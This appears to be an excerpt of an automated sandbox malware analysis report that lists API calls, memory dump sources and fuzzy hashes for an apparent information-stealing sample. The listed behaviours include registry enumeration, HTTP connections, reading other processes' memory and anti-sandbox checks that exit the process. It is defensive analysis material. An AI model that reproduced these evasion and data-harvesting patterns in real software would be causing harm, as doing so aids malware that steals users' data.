                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                      • String ID: CurrentBuildNumber
                      • API String ID: 3466090806-1022791448
                      • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                      • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                      • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                      • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                      APIs
                      • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                      • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                      • CloseHandle.KERNEL32(000000FF), ref: 00419327
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$CloseCreateHandleSize
                      • String ID: :A$:A
                      • API String ID: 1378416451-1974578005
                      • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                      • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                      • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                      • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                      APIs
                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 041075A1
                      • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 04107618
                      • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 04107674
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 041076B9
                      • HeapFree.KERNEL32(00000000), ref: 041076C0
                        • Part of subcall function 041094A7: vsprintf_s.MSVCRT ref: 041094C2
                      • task.LIBCPMTD ref: 041077BC
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                      • String ID:
                      • API String ID: 700816787-0
                      • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                      • Instruction ID: 5019af249ee8368aca8eae40fc8059f3c3c8f633263ad819dfbc916cb484bd48
                      • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                      • Instruction Fuzzy Hash: 8E610AB59042689BEB24DB50CD94FE9B7B8BF44304F00C1E9E649A6180DBB0ABC5CF94
                      APIs
                        • Part of subcall function 0411AA07: lstrcpy.KERNEL32(?,00000000), ref: 0411AA4D
                        • Part of subcall function 041064E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 04106548
                        • Part of subcall function 041064E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 0410656A
                        • Part of subcall function 041064E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0410659C
                        • Part of subcall function 041064E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 041065EC
                        • Part of subcall function 041064E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 04106626
                        • Part of subcall function 041064E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 04106638
                        • Part of subcall function 0411AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0411AB6C
                      • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 0411557F
                      • lstrlen.KERNEL32(00000000), ref: 04115596
                        • Part of subcall function 04119097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 041190B9
                      • StrStrA.SHLWAPI(00000000,00000000), ref: 041155CB
                      • lstrlen.KERNEL32(00000000), ref: 041155EA
                      • strtok.MSVCRT(00000000,?), ref: 04115605
                      • lstrlen.KERNEL32(00000000), ref: 04115615
                        • Part of subcall function 0411A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0411A9EF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                      • String ID:
                      • API String ID: 3532888709-0
                      • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                      • Instruction ID: 182c98298dbc2c3ed024f4c89a5dfc856de2b5e6e86e523b4165fb6908ed3b11
                      • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                      • Instruction Fuzzy Hash: 46511870911208EBEB18FFA0DED1EED7B75AF50388F904029E90A665B0EB347B45CB51
                      APIs
                      • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 04117345
                        • Part of subcall function 0411A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0411A9EF
                      • OpenProcess.KERNEL32(001FFFFF,00000000,04117574,004205BD), ref: 04117383
                      • memset.MSVCRT ref: 041173D1
                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 04117525
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: OpenProcesslstrcpymemset
                      • String ID:
                      • API String ID: 224852652-0
                      • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                      • Instruction ID: 6d37d206726ab48029e101f7ca69c10ba19d4cbe6f74d937011fef11cf4ca854
                      • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                      • Instruction Fuzzy Hash: CC513EB0D00218DBDB54EBA4DCC4BEDBB74AF44309F5085B9E11AA62D1EB747A84CF58
                      APIs
                      • memset.MSVCRT ref: 004140D5
                      • RegOpenKeyExA.ADVAPI32(80000001,0254D6D0,00000000,00020119,?), ref: 004140F4
                      • RegQueryValueExA.ADVAPI32(?,0254DE00,00000000,00000000,00000000,000000FF), ref: 00414118
                      • RegCloseKey.ADVAPI32(?), ref: 00414122
                      • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                      • lstrcatA.KERNEL32(?,0254DD88), ref: 0041415B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$CloseOpenQueryValuememset
                      • String ID:
                      • API String ID: 2623679115-0
                      • Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                      • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                      • Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                      • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                      APIs
                      • memset.MSVCRT ref: 0411433C
                      • RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 0411435B
                      • RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 0411437F
                      • RegCloseKey.ADVAPI32(?), ref: 04114389
                      • lstrcat.KERNEL32(?,00000000), ref: 041143AE
                      • lstrcat.KERNEL32(?,0064A168), ref: 041143C2
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$CloseOpenQueryValuememset
                      • String ID:
                      • API String ID: 2623679115-0
                      • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                      • Instruction ID: 14e0156fa3fe0ecfd635503dec4312f556f83937c1b4f9708137da2453987e11
                      • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                      • Instruction Fuzzy Hash: 434199B6940108BBEB14FBE0DC85FEE737DAB59700F00855CA615571D0EBB667888BE2
                      APIs
                      • strtok_s.MSVCRT ref: 00413588
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • strtok_s.MSVCRT ref: 004136D1
                        • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,025165B0,?,0042110C,?,00000000), ref: 0041A82B
                        • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpystrtok_s$lstrlen
                      • String ID:
                      • API String ID: 3184129880-0
                      • Opcode ID: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                      • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                      • Opcode Fuzzy Hash: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                      • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                      APIs
                      • __lock.LIBCMT ref: 0041B39A
                        • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                        • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                        • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041AFD6
                      • DecodePointer.KERNEL32(0042A130,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                      • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B3E7
                        • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                      • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B40D
                      • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B420
                      • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F0,0000000C,0041AC2A), ref: 0041B42A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                      • String ID:
                      • API String ID: 2005412495-0
                      • Opcode ID: b7f77734ebbf3840f36807ba88357d63e713c7e7dec9936b016044a468d43742
                      • Instruction ID: 63863d844e937e4da23c5f373c227dc8c5909fe93770eb0c6870133be37feb4a
                      • Opcode Fuzzy Hash: b7f77734ebbf3840f36807ba88357d63e713c7e7dec9936b016044a468d43742
                      • Instruction Fuzzy Hash: 05314874900309DFDF109FA9C9452DEBAF1FF48314F10802BE454A6262CBB94891DFAE
                      APIs
                        • Part of subcall function 04119AC7: GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 04119B08
                        • Part of subcall function 04119AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 04119B21
                        • Part of subcall function 04119AC7: GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 04119B39
                        • Part of subcall function 04119AC7: GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 04119B51
                        • Part of subcall function 04119AC7: GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 04119B6A
                        • Part of subcall function 04119AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 04119B82
                        • Part of subcall function 04119AC7: GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 04119B9A
                        • Part of subcall function 04119AC7: GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 04119BB3
                        • Part of subcall function 04119AC7: GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 04119BCB
                        • Part of subcall function 04119AC7: GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 04119BE3
                        • Part of subcall function 04119AC7: GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 04119BFC
                        • Part of subcall function 04119AC7: GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 04119C14
                        • Part of subcall function 04119AC7: GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 04119C2C
                        • Part of subcall function 04119AC7: GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 04119C45
                        • Part of subcall function 0411A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0411A9EF
                        • Part of subcall function 04101437: ExitProcess.KERNEL32 ref: 04101478
                        • Part of subcall function 041013C7: GetSystemInfo.KERNEL32(?), ref: 041013D1
                        • Part of subcall function 041013C7: ExitProcess.KERNEL32 ref: 041013E5
                        • Part of subcall function 04101377: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 04101392
                        • Part of subcall function 04101377: VirtualAllocExNuma.KERNEL32(00000000), ref: 04101399
                        • Part of subcall function 04101377: ExitProcess.KERNEL32 ref: 041013AA
                        • Part of subcall function 04101487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 041014A5
                        • Part of subcall function 04101487: __aulldiv.LIBCMT ref: 041014BF
                        • Part of subcall function 04101487: __aulldiv.LIBCMT ref: 041014CD
                        • Part of subcall function 04101487: ExitProcess.KERNEL32 ref: 041014FB
                        • Part of subcall function 041169D7: GetUserDefaultLangID.KERNEL32 ref: 041169DB
                        • Part of subcall function 041013F7: ExitProcess.KERNEL32 ref: 0410142D
                        • Part of subcall function 04117AB7: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0410141E), ref: 04117AE7
                        • Part of subcall function 04117AB7: RtlAllocateHeap.NTDLL(00000000), ref: 04117AEE
                        • Part of subcall function 04117AB7: GetUserNameA.ADVAPI32(00000104,00000104), ref: 04117B06
                        • Part of subcall function 04117B47: GetProcessHeap.KERNEL32(00000000,00000104), ref: 04117B77
                        • Part of subcall function 04117B47: RtlAllocateHeap.NTDLL(00000000), ref: 04117B7E
                        • Part of subcall function 04117B47: GetComputerNameA.KERNEL32(?,00000104), ref: 04117B96
                        • Part of subcall function 0411AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0411AC2C
                        • Part of subcall function 0411AC17: lstrcpy.KERNEL32(00000000), ref: 0411AC6B
                        • Part of subcall function 0411AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0411AC79
                        • Part of subcall function 0411AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0411AB6C
                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 04116D31
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 04116D4F
                      • CloseHandle.KERNEL32(00000000), ref: 04116D60
                      • Sleep.KERNEL32(00001770), ref: 04116D6B
                      • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 04116D81
                      • ExitProcess.KERNEL32 ref: 04116D89
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                      • String ID:
                      • API String ID: 2525456742-0
                      • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                      • Instruction ID: b8b601ba9cf79ba0538fcf22a710106aecb1cab6c7911b7bf2a57a60181d8a5b
                      • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                      • Instruction Fuzzy Hash: E9315A75A40208ABEB04FBF0DCD5FFD7B79AF54348F104539A146A61A0EFB47A04CA61
                      APIs
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                      • LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                      • ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                      • LocalFree.KERNEL32(004102E7), ref: 00409A90
                      • CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                      • String ID:
                      • API String ID: 2311089104-0
                      • Opcode ID: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                      • Instruction ID: ed52a4b53b9c0591db71eabf51b59360b39b3b260bb7ca760b64e801f0f9a50e
                      • Opcode Fuzzy Hash: 7104a1ad71f7267fb3f92d709a770ba7d5c34dd003ba373b3d6e6f2e7190c7f7
                      • Instruction Fuzzy Hash: 02310778A00209EFDB14CF94C985BAEB7B5FF49350F108169E901A7390D778AD41CFA5
                      APIs
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 04109C53
                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 04109C78
                      • LocalAlloc.KERNEL32(00000040,?), ref: 04109C98
                      • ReadFile.KERNEL32(000000FF,?,00000000,041016F6,00000000), ref: 04109CC1
                      • LocalFree.KERNEL32(041016F6), ref: 04109CF7
                      • CloseHandle.KERNEL32(000000FF), ref: 04109D01
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                      • String ID:
                      • API String ID: 2311089104-0
                      • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                      • Instruction ID: 731f072e4a4c71c320eb927d319e23d9c05641a1a39553f814148277d2d35d6f
                      • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                      • Instruction Fuzzy Hash: CF3116B8A40209EFDB14CF94C994BAE7BF5FF48300F108198E915AB2D0C774AA41CFA1
                      APIs
                      • __getptd.LIBCMT ref: 0041C9EA
                        • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                        • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                      • __amsg_exit.LIBCMT ref: 0041CA0A
                      • __lock.LIBCMT ref: 0041CA1A
                      • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                      • free.MSVCRT ref: 0041CA4A
                      • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                      • String ID:
                      • API String ID: 634100517-0
                      • Opcode ID: 9cc761a24a700c336990656e08babd42fdc3626541d12aa0f7b86557c35da351
                      • Instruction ID: 63787520114d18ae3399c837c16bfac6c494309a1b2e91ce42418771fe72ad0a
                      • Opcode Fuzzy Hash: 9cc761a24a700c336990656e08babd42fdc3626541d12aa0f7b86557c35da351
                      • Instruction Fuzzy Hash: DD01C431A817299BC722EB669C857DE77A0BF04794F11811BE814A7390C73C69D2CBDD
                      APIs
                      • __getptd.LIBCMT ref: 0411CC51
                        • Part of subcall function 0411C206: __getptd_noexit.LIBCMT ref: 0411C209
                        • Part of subcall function 0411C206: __amsg_exit.LIBCMT ref: 0411C216
                      • __amsg_exit.LIBCMT ref: 0411CC71
                      • __lock.LIBCMT ref: 0411CC81
                      • InterlockedDecrement.KERNEL32(?), ref: 0411CC9E
                      • free.MSVCRT ref: 0411CCB1
                      • InterlockedIncrement.KERNEL32(0042B980), ref: 0411CCC9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                      • String ID:
                      • API String ID: 634100517-0
                      • Opcode ID: 9842265763d25ebdd135a5071e54c4fa9195cc385294f2eefb115a4ad94e6967
                      • Instruction ID: 8d9c7ef136bc75eec1fc7e46f05cdb08c38bdb0bab61c9b8b870aa703515c837
                      • Opcode Fuzzy Hash: 9842265763d25ebdd135a5071e54c4fa9195cc385294f2eefb115a4ad94e6967
                      • Instruction Fuzzy Hash: 90010031A81B65ABDB20AB6494C475C7760BF00754F040176DC10A72B0E7347881EFD9
                      APIs
                      • strlen.MSVCRT ref: 00416F1F
                      • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                        • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                        • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                      • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                      • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                        • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: strlen$MemoryProcessQueryReadVirtual
                      • String ID: @
                      • API String ID: 2950663791-2766056989
                      • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                      • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
